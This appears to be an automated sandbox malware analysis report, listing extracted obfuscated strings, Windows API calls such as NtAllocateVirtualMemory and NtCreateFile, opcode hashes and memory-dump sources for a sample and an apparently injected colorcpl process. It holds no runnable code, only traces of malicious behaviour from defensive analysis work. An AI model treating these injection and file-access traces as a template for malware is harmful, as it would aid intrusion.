                                                                                                        • Snapshot File: hcaresult_4_2_6ba0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: /$0$?$D$K5$Lt$Mu$XW$^$^[$v$z$z4$}$'$5z4$w
                                                                                                        • API String ID: 0-2045270831
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                        • API String ID: 0-3248090998
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                        • API String ID: 0-3248090998
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "$#$($($+$-$-O$1$8L$:$:$<V$?%$C$Pf$T$WA$]$^$b$c}$d$t$v"$vO$y$,$6
                                                                                                        • API String ID: 0-2981804867
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                        • API String ID: 0-1002149817
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                        • API String ID: 0-3236418099
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $.$@4>J$F$P$e$i$l$m$o$o$r$s$x
                                                                                                        • API String ID: 0-1771628126
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: G)3G$G0(0$QIU\$QIWI$QIWIWIU$QIWN$QS\G$RIWG$UQIW$VWVG$WIU$WVWW$g
                                                                                                        • API String ID: 0-4202404308
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                        • API String ID: 0-685823316
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                        • API String ID: 0-685823316
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                        • API String ID: 0-2304485323
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .$P$e$i$m$o$r$x
                                                                                                        • API String ID: 0-620024284
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .$P$e$i$m$o$r$x
                                                                                                        • API String ID: 0-620024284
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @4>J$L$S$\$a$c$e$l
                                                                                                        • API String ID: 0-4139028360
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5$E$P$Q$S$p$z
                                                                                                        • API String ID: 0-3160930913
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@4>J$i$l$o$u
                                                                                                        • API String ID: 0-3841981591
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F$P$T$f$r$x
                                                                                                        • API String ID: 0-2523166886
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@4>J$i$l$o$u
                                                                                                        • API String ID: 0-3841981591
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@4>J$e$k$o
                                                                                                        • API String ID: 0-1109533214
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@4>J$e$k$o
                                                                                                        • API String ID: 0-1109533214
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $e$h$o
                                                                                                        • API String ID: 0-3662636641
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                        • API String ID: 0-2877786613
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                        • API String ID: 0-2877786613
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $e$h$o
                                                                                                        • API String ID: 0-3662636641
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$E$K$O
                                                                                                        • API String ID: 0-518338784
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $e$k$o
                                                                                                        • API String ID: 0-3624523832
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $e$k$o
                                                                                                        • API String ID: 0-3624523832
                                                                                                        • Opcode ID: f78bdf9a71d80c7e8009ffa7a4cf0da75cccca17a84467da5b9d6f7085b5ce9b
                                                                                                        • Instruction ID: ee21bdedb79ed9b8bd7067e379dc82370648c7a06605cecfb8d4c68e5c7dd7a8
                                                                                                        • Opcode Fuzzy Hash: f78bdf9a71d80c7e8009ffa7a4cf0da75cccca17a84467da5b9d6f7085b5ce9b
                                                                                                        • Instruction Fuzzy Hash: BB0184B2900218ABDB14DF98D884EDEF7B9FF48314F049259E9196B205E771B549CBA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: I$g|$r8ty$r8tyg|
                                                                                                        • API String ID: 0-745488224
                                                                                                        • Opcode ID: f2ec19e73ae3643ce71873b1a0c3b6d565fa315b85ecc899d9f2fd1911051c5c
                                                                                                        • Instruction ID: 4ec95d19d8640d284d84847cb78bbf036eb9626ad1f54a967a971d4dcc969a35
                                                                                                        • Opcode Fuzzy Hash: f2ec19e73ae3643ce71873b1a0c3b6d565fa315b85ecc899d9f2fd1911051c5c
                                                                                                        • Instruction Fuzzy Hash: 96E092B580024C6ADB00EFE4C841AAEBB38EF00240F209D98C9549B261D7719605C79A

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.5%
                                                                                                        Dynamic/Decrypted Code Coverage:4.2%
                                                                                                        Signature Coverage:1.6%
                                                                                                        Total number of Nodes:450
                                                                                                        Total number of Limit Nodes:77
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 0321C494
                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 0321C4CF
                                                                                                        • FindClose.KERNELBASE(?), ref: 0321C4DA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 3541575487-0
                                                                                                        • Opcode ID: 0c02a8ca265d129e42cc71690012151faf97ecebfd056058fb98977b22bd933c
                                                                                                        • Instruction ID: 2a6617d97f913c4e3f43229e48064b0ddbecbc5cc600c0f709fd50841bb63064
                                                                                                        • Opcode Fuzzy Hash: 0c02a8ca265d129e42cc71690012151faf97ecebfd056058fb98977b22bd933c
                                                                                                        • Instruction Fuzzy Hash: 02310379950318BBDB20EFA0CC81FFB77BCDB54700F144458B909AB080DAB0AAD48BA1
                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03228FBE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 09255f75fd08aaf16a15e8c7a8ecc55cb742fe4f6a110c8cfe71c3456905ff00
                                                                                                        • Instruction ID: 03ab5ddf136bf0ca34b46515267f9dfddd63f2dcaddfb374cc5d3735cee826cc
                                                                                                        • Opcode Fuzzy Hash: 09255f75fd08aaf16a15e8c7a8ecc55cb742fe4f6a110c8cfe71c3456905ff00
                                                                                                        • Instruction Fuzzy Hash: 7A31D6B5A10248AFDB14DF98D881EDEBBB9EF8C304F108119F919AB344D774A851CBA5
                                                                                                        APIs
                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03229116
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: dd8e6a020eed22182841d26150f8e485d3ee1976af8ba434d9872f59c73314c6
                                                                                                        • Instruction ID: 1ac44496c1ce9326707bdde8ba872854abd27004b9a0c9605563a1d86d9360c9
                                                                                                        • Opcode Fuzzy Hash: dd8e6a020eed22182841d26150f8e485d3ee1976af8ba434d9872f59c73314c6
                                                                                                        • Instruction Fuzzy Hash: 7C31E8B5A10248AFDB14DF98DC41EDFBBB9EF88314F108109F919AB240D774A851CFA5
                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(03211B8E,?,03227E0E,00000000,00000004,00003000,?,?,?,?,?,03227E0E,03211B8E), ref: 032293EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: 791fe5aee6c4ccce90167758e625808fa971abe00af37c983824597c540c284e
                                                                                                        • Instruction ID: 285fd7da74886c7759b8f0fe66304cb22d537a26a3c42d077276c6b5703afcda
                                                                                                        • Opcode Fuzzy Hash: 791fe5aee6c4ccce90167758e625808fa971abe00af37c983824597c540c284e
                                                                                                        • Instruction Fuzzy Hash: 6C2119B5A10309AFDB10DF98DC41EEFBBB9EF88304F008109F919AB240D774A951CBA1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 4033686569-0
                                                                                                        • Opcode ID: 876a2cd22cab806990b3ef133206fa3bee5b983be8e20418055e3e13876e6c4c
                                                                                                        • Instruction ID: 49e774663c32b61ce7a7706d407ade3b45408ee7a2f023204bef4466d763f769
                                                                                                        • Opcode Fuzzy Hash: 876a2cd22cab806990b3ef133206fa3bee5b983be8e20418055e3e13876e6c4c
                                                                                                        • Instruction Fuzzy Hash: EF119E75A103187ED620EA68CC41FEBBB6CDF85714F408509F918AB280D7B5B555CBA1
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 032291F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                                                                                                        • Instruction ID: c51bedf02424cf2c2e16034536ff356eb05e3a1e546276fc878ce14bb3d54e36
                                                                                                        • Opcode Fuzzy Hash: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                                                                                                        • Instruction Fuzzy Hash: CBE08C7A2002147BD620FA5ADC01FAB7B6CDFC5764F408015FA08AB281C6B5B92487F5
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: bcb20833ae154a8e4fa72d8c79d0acab5398fd18b76cfe7d13c6560bfe088ba8
                                                                                                        • Instruction ID: 7319bb42b3a99a89246181b715967d4e8dd63428c7d1f1bc89c4b166e44756d5
                                                                                                        • Opcode Fuzzy Hash: bcb20833ae154a8e4fa72d8c79d0acab5398fd18b76cfe7d13c6560bfe088ba8
                                                                                                        • Instruction Fuzzy Hash: FE9002A3B115004341407198484440660159BE13013D5C115A1554560D865889559269
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ddcde57dcd623d1a057043a90d7d7a4bd7ba9b51fdbce03492eb8347a639ca6f
                                                                                                        • Instruction ID: d6531115a003bf6ed418c090ac013b22a0f52005666ff97611205a00bda151a6
                                                                                                        • Opcode Fuzzy Hash: ddcde57dcd623d1a057043a90d7d7a4bd7ba9b51fdbce03492eb8347a639ca6f
                                                                                                        • Instruction Fuzzy Hash: 72900273B15800139140719848C454640159BE0301B95C011E1424554D8A548A565361
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 8953181ee0cf73f7a5aac668209e83bb2ae7aa07ca73d55b07dedd5c78ca61ed
                                                                                                        • Instruction ID: f331ca3043b59cc3975a95ae0547a27d4021d4dbaf7523386742e44f8acc6aee
                                                                                                        • Opcode Fuzzy Hash: 8953181ee0cf73f7a5aac668209e83bb2ae7aa07ca73d55b07dedd5c78ca61ed
                                                                                                        • Instruction Fuzzy Hash: C890047371140003D14071DC545C7074015DFF1301FD5D011F1414554DDD55CD575333
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: aaa32ba63d38e6066c673ca549774a3c9ab4619884a2dcc5d7f07ff85d8ce244
                                                                                                        • Instruction ID: a29de0d69c94a22c610617675ca5d5bbdccda1a084b7de748ddd7842d0c3b21c
                                                                                                        • Opcode Fuzzy Hash: aaa32ba63d38e6066c673ca549774a3c9ab4619884a2dcc5d7f07ff85d8ce244
                                                                                                        • Instruction Fuzzy Hash: 1F90026B72340003D1807198544860A00158BD1302FD5D415A1015558DC95589695321
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 45bc8b907d262d850291293e6d9f4c5064eab781bce0438af1ef96b69099bda1
                                                                                                        • Instruction ID: 20f47d4795d4d93d617186cbb9ff75ef4c358620091e7958ed2410acc071e0c3
                                                                                                        • Opcode Fuzzy Hash: 45bc8b907d262d850291293e6d9f4c5064eab781bce0438af1ef96b69099bda1
                                                                                                        • Instruction Fuzzy Hash: A290027371140413D1117198454470700198BD0341FD5C412A1424558E96968A52A121
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: fe14c7d0114e4aa6cf3d15a29cebc620ceab34844873c9ada5ec59a39dd02c07
                                                                                                        • Instruction ID: 81dcba323e7d3de7089026af1b29ea56d986b650a60fb327487c9c89fe733f92
                                                                                                        • Opcode Fuzzy Hash: fe14c7d0114e4aa6cf3d15a29cebc620ceab34844873c9ada5ec59a39dd02c07
                                                                                                        • Instruction Fuzzy Hash: BE900263752441535545B198444450740169BE03417D5C012A2414950D85669956D621
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 70375bad3d0b422a4dc9044be692811238ad2923202c70a2a3507042921350d5
                                                                                                        • Instruction ID: c3b754580bbb896c89c11942c34cba938c4a5bc841f757837ec56a1465c8399b
                                                                                                        • Opcode Fuzzy Hash: 70375bad3d0b422a4dc9044be692811238ad2923202c70a2a3507042921350d5
                                                                                                        • Instruction Fuzzy Hash: CC90027371140843D10071984444B4600158BE0301F95C016A1124654E8655C9517521
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e20c1eb2015937b0ba6a230a1caec26d69c75740aebeb17f8cb902ba6a9cbe87
                                                                                                        • Instruction ID: dd92ac7c6b760acc58dd5c165821f35162d2d0d9c60f58bd7967d9187ca865fd
                                                                                                        • Opcode Fuzzy Hash: e20c1eb2015937b0ba6a230a1caec26d69c75740aebeb17f8cb902ba6a9cbe87
                                                                                                        • Instruction Fuzzy Hash: 1390027371148803D1107198844474A00158BD0301F99C411A5424658E86D589917121
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e67250c5afd0ed0b7ff3967ceaf6e199e4c4195989658f0281fb4c16a6570bd6
                                                                                                        • Instruction ID: 72389c5518d4c5d3c0650031c44028314f8c7855a84a5304b9a0173f743b3820
                                                                                                        • Opcode Fuzzy Hash: e67250c5afd0ed0b7ff3967ceaf6e199e4c4195989658f0281fb4c16a6570bd6
                                                                                                        • Instruction Fuzzy Hash: EB90027371140403D10075D8544864600158BE0301F95D011A6024555FC6A589916131
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 27c727d00a200404d8fd8bf819881ee369947904ba26fe1cf6810e2a4e038440
                                                                                                        • Instruction ID: 26b2301ed75060a7263f98b5e105e522843ffb8ad7e5f4f575b30bb0736d3aca
                                                                                                        • Opcode Fuzzy Hash: 27c727d00a200404d8fd8bf819881ee369947904ba26fe1cf6810e2a4e038440
                                                                                                        • Instruction Fuzzy Hash: 849002A375140443D10071984454B060015CBE1301F95C015E2064554E8659CD526126
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
